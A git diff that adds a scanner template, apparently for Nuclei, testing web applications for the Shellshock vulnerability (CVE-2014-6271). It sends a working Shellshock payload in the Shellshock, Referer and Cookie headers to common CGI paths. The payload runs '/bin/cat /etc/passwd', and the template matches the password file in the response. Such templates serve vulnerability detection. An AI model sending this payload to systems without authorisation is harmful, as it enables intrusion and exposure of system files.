diff --git a/cves/CVE-2014-6271.yaml b/cves/CVE-2014-6271.yaml
new file mode 100644
index 0000000000..512efd2dba
--- /dev/null
+++ b/cves/CVE-2014-6271.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-6271
+
+info:
+  name: Shellshock
+  author: pentest_swissky
+  severity: high
+  description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
+  # reference: https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/cgi-bin/status"
+      - "{{BaseURL}}/cgi-bin/stats"
+      - "{{BaseURL}}/cgi-bin/test"
+      - "{{BaseURL}}/cgi-bin/status/status.cgi"
+      - "{{BaseURL}}/test.cgi"
+      - "{{BaseURL}}/debug.cgi"
+    headers:
+        Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+        Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+        Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body
\ No newline at end of file